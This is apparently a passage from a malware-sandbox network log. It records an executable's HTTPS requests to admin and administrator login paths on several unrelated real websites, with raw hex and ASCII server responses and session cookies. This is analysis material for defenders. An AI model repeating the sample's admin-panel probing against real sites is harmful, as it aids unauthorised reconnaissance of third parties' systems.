                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC929INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 38 36 34 30 30 2c 20 70 75 62 6c 69 63 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 45 74 61 67 3a 20 57 2f 22 31 37 30 30 39 37 38 33 38 35 22 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 31 39 20 4e 6f 76 20 31 39 37 38 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenConnection: closeCache-Control: max-age=86400, publicContent-Language: enContent-Type: text/html; charset=UTF-8Etag: W/"1700978385"Expires: Sun, 19 Nov 1978 05:00:00 GMTLast-Modified: Sun, 26 Nov 2023 05:59:45 GMTServ
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC6INData Raw: 33 63 35 34 0d 0a
                                                                                                                                                                                                    Data Ascii: 3c54
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1368INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 20 73 63 68 65 6d 61 3a 20 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://schema
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1368INData Raw: 69 6f 6e 49 44 3a 76 6f 69 64 20 30 2c 73 61 3a 76 6f 69 64 20 30 2c 71 75 65 75 65 54 69 6d 65 3a 76 6f 69 64 20 30 2c 61 70 70 6c 69 63 61 74 69 6f 6e 54 69 6d 65 3a 76 6f 69 64 20 30 2c 74 74 47 75 69 64 3a 76 6f 69 64 20 30 2c 75 73 65 72 3a 76 6f 69 64 20 30 2c 61 63 63 6f 75 6e 74 3a 76 6f 69 64 20 30 2c 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20
                                                                                                                                                                                                    Data Ascii: ionID:void 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},o={};function s(e){if(!e)throw
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1368INData Raw: 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 6d 65 74 72 69 63 73 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 61 63 74 69 6f 6e 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 6c 6f 6e 67 5f 74 61 73 6b 3a 21 31 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d
                                                                                                                                                                                                    Data Ascii: ed:!0,harvestTimeSeconds:10,autoStart:!0},metrics:{enabled:!0,autoStart:!0},page_action:{enabled:!0,harvestTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1,autoStart:!0}
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1368INData Raw: 70 3d 22 41 6c 6c 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 3b 66 75 6e 63 74 69 6f 6e 20 68 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 69 66 28 21 67 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 67 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 67 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 66 28 29 29 3b 63 6f 6e 73 74 20 6e 3d 28 30
                                                                                                                                                                                                    Data Ascii: p="All configuration objects require an agent identifier!";function h(e){if(!e)throw new Error(p);if(!g[e])throw new Error("Configuration for ".concat(e," was never set"));return g[e]}function v(e,t){if(!e)throw new Error(p);g[e]=(0,i.D)(t,f());const n=(0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1368INData Raw: 2c 45 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6a 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 45 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 45 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74
                                                                                                                                                                                                    Data Ascii: ,E={};function j(e){if(!e)throw new Error("All runtime objects require an agent identifier!");if(!E[e])throw new Error("Runtime for ".concat(e," was never set"));return E[e]}function T(e,t){if(!e)throw new Error("All runtime objects require an agent ident
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1368INData Raw: 3d 3e 61 2c 63 76 3a 28 29 3d 3e 6c 2c 69 53 3a 28 29 3d 3e 6f 2c 69 6c 3a 28 29 3d 3e 72 2c 75 78 3a 28 29 3d 3e 63 2c 76 36 3a 28 29 3d 3e 69 2c 77 31 3a 28 29 3d 3e 75 7d 29 3b 63 6f 6e 73 74 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 21 21 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 4e 61 76 69 67 61
                                                                                                                                                                                                    Data Ascii: =>a,cv:()=>l,iS:()=>o,il:()=>r,ux:()=>c,v6:()=>i,w1:()=>u});const r="undefined"!=typeof window&&!!window.document,i="undefined"!=typeof WorkerGlobalScope&&("undefined"!=typeof self&&self instanceof WorkerGlobalScope&&self.navigator instanceof WorkerNaviga
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1368INData Raw: 65 73 28 74 29 26 26 28 74 68 69 73 2e 73 68 61 72 65 64 43 6f 6e 74 65 78 74 5b 74 5d 3d 6e 29 7d 29 29 7d 63 61 74 63 68 28 65 29 7b 28 30 2c 72 2e 5a 29 28 22 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 65 64 20 77 68 69 6c 65 20 73 65 74 74 69 6e 67 20 53 68 61 72 65 64 43 6f 6e 74 65 78 74 22 2c 65 29 7d 7d 7d 7d 2c 38 65 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 64 2c 52 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 72 3d 6e 28 38 33 32 35 29 2c 69 3d 6e 28 31 32 38 34 29 2c 61 3d 6e 28 34 33 32 32 29 2c 6f 3d 6e 28 33 33 32 35 29 3b 63 6f 6e 73 74 20 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 7b 73 74 61 67 65 64 3a 21 31 2c 70 72 69 6f 72 69
                                                                                                                                                                                                    Data Ascii: es(t)&&(this.sharedContext[t]=n)}))}catch(e){(0,r.Z)("An error occured while setting SharedContext",e)}}}},8e3:(e,t,n)=>{"use strict";n.d(t,{L:()=>d,R:()=>c});var r=n(8325),i=n(1284),a=n(4322),o=n(3325);const s={};function c(e,t){const n={staged:!1,priori
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1368INData Raw: 7b 7d 76 61 72 20 67 3d 7b 6f 6e 3a 68 2c 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3a 68 2c 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 72 5b 65 5d 3b 69 66 28 21 6e 29 72 65 74 75 72 6e 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 6e 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 6e 5b 69 5d 3d 3d 3d 74 26 26 6e 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 69 2c 61 29 7b 21 31 21 3d 3d 61 26 26 28 61 3d 21 30 29 3b 69 66 28 75 2e 61 62 6f 72 74 65 64 26 26 21 69 29 72 65 74 75 72 6e 3b 74 26 26 61 26 26 74 2e 65 6d 69 74 28 65 2c 6e 2c 72 29 3b 66 6f 72 28 76 61 72 20 6f 3d 70 28 72 29 2c 63 3d 76 28 65 29 2c 64 3d 63 2e 6c 65
                                                                                                                                                                                                    Data Ascii: {}var g={on:h,addEventListener:h,removeEventListener:function(e,t){var n=r[e];if(!n)return;for(var i=0;i<n.length;i++)n[i]===t&&n.splice(i,1)},emit:function(e,n,r,i,a){!1!==a&&(a=!0);if(u.aborted&&!i)return;t&&a&&t.emit(e,n,r);for(var o=p(r),c=v(e),d=c.le


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    463192.168.2.451382199.34.228.1774436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC185OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.gatewaytoearlylearning.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1123INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 75 62 6c 69 73 68 65 64 73 69 74 65 2d 78 73 72 66
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCache-Control: no-cache, privateDate: Sun, 26 Nov 2023 05:59:45 GMTSet-Cookie: publishedsite-xsrf
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC608INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 75 62 6c 69 73 68 65 64 53 69 74 65 53 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 56 57 4d 57 35 73 52 57 6c 36 56 54 64 43 4e 33 64 47 54 7a 68 61 4d 54 64 6c 52 6b 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 52 6e 6f 34 5a 32 4e 51 61 55 6c 6f 62 31 49 76 61 48 5a 6f 64 7a 67 79 53 33 64 4d 4e 6d 70 33 56 45 68 44 51 32 64 76 59 7a 59 34 52 31 42 52 61 53 74 78 57 44 4e 51 4e 32 78 43 57 6d 31 44 4d 6c 49 33 64 7a 52 57 53 31 6b 72 52 48 4d 33 64 6d 4a 32 51 6b 6b 77 57 6e 6c 74 63 55 78 59 4f 47 46 57 63 44 68 69 53 54 56 46 65 46 64 4c 56 46 59 76 64 55 67 72 54 7a 52 4e 4d 30 5a 71 65 45 51 79 51 57 35 48 53 6b 38 31 4e 69 39 6f 57 47 77 72 51 7a 64 47 64 54 56 54 53 57 78 47 53 7a 52 4c 57 48
                                                                                                                                                                                                    Data Ascii: Set-Cookie: PublishedSiteSession=eyJpdiI6InVWMW5sRWl6VTdCN3dGTzhaMTdlRkE9PSIsInZhbHVlIjoiRno4Z2NQaUlob1IvaHZodzgyS3dMNmp3VEhDQ2dvYzY4R1BRaStxWDNQN2xCWm1DMlI3dzRWS1krRHM3dmJ2QkkwWnltcUxYOGFWcDhiSTVFeFdLVFYvdUgrTzRNM0ZqeEQyQW5HSk81Ni9oWGwrQzdGdTVTSWxGSzRLWH
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1580INData Raw: 36 32 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 20 41 72 69 61 6c 2c 20 73 61
                                                                                                                                                                                                    Data Ascii: 620<!doctype html><html><head> <title>404 - Page Not Found</title> <style type="text/css"> html, body { height: 100%; margin: 0; padding: 0; font-family: Roboto, Helvetica Neue, Arial, sa


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    464192.168.2.45175572.167.58.1614436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC167OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                    Host: webstamp.ca
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC275INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e 73 65 63 75 72 65 2d 72 65 71 75 65 73 74 73 3b 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:45 GMTServer: ApacheContent-Security-Policy: upgrade-insecure-requests;Upgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-EncodingTransfer-Encoding: chunkedContent
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC643INData Raw: 32 37 37 0d 0a 2f 61 64 6d 69 6e 2f 4f 4f 50 53 21 20 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f 6e 67 2e 20 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 68 61 73 20 62 65 65 6e 20 0d 0a 72 65 6d 6f 76 65 64 20 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 64 65 72 20 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 0d 0a 46 65 65 6c 20 66 72 65 65 20 74 6f 20 72 65 61 64 20 74 68 65 20 6d 61 6e 79 20 6f 74 68 65 72 20 61 72 74 69 63 6c 65 73 20 61 76 61 69 6c 61 62 6c 65 20 61 74 20 0d 0a 68 74 74 70 73 3a 2f 2f 77 65 62 73 74 61 6d 70 2e 63 61 0d 0a 3c 21 2d 2d 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 277/admin/OOPS! Something went wrong. The page you requested has been removed or is currently under maintenance.Feel free to read the many other articles available at https://webstamp.ca...


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    465192.168.2.451312120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC968OUTGET /saml/index.php?page=%2Fadministrator%2Findex.php HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=0o33saodno7vmroa695q9i7ie9
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://login.microsoftonline.com/c8f4395e-fa4e-4196-adb9-ba2cd2ca09f0/saml2?SAMLRequest=fZJRb9owFIXf%2BRVV3uM4CaGJBUisrC0SA1TYHvYyXeybYsmxU9tpx79fiLd1mzTu4%2FE9n8498tRBo1q26PxJP%2BFLh86Pbvr53ijt2PA4izqrmQEnHdPQoGOes%2F3i05plhLLWGm%2B4UdE%2FtusucA6tl0YH22o5i7abj%2Bvtw2rzbZJCxbEu6FHc5hWnNE2xHFdlWRcgUBR5QUHkcBusX9C6njOLemw0CjTnOlxp50H7XqdZHqdpnE0OtGBFxfLya7Au%2B2OlBj%2FYT963jiWJMs9Sk0Zya5ypvdFKaiTcNAkv63FeFRjXMMZ4nFaTGMSxio%2BQcZFxoFVNk8vpWcDvfjbzQWoh9fP1Qo5hybHHw2EX77b7Q4AsfhV1Z7TrGrR7tK%2BS4%2Ben9Xvm5kw4qFewZ%2FKiBEHREeiGKAkPNtKe2mg%2BEKcXnQ0d2flVwjT5c%2FXd3LJNn3%2B13Bkl%2BXnQL3NvbAP%2B%2F2emJB0UKeJ6WGWddi1yWUsU0W%2FMQinzdmcRPM4ibzuMbpL5KGT5%2B6POfwA%3D&RelayState=%2Fadministrator%2F
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1089INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTPragma: no-cacheCache-Control: no-cache, must-revalida
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    466192.168.2.45150515.236.29.1064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC162OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: getquipu.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 34 36 34 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 31 34 3a 33 35 3a 30 33 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 36 35 35 66 36 33 31 37 2d 31 37 31 62 31 22 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:45 GMTContent-Type: text/htmlContent-Length: 94641Connection: closeLast-Modified: Thu, 23 Nov 2023 14:35:03 GMTETag: "655f6317-171b1"Strict-Transport-Security: max-age=31536000; incl
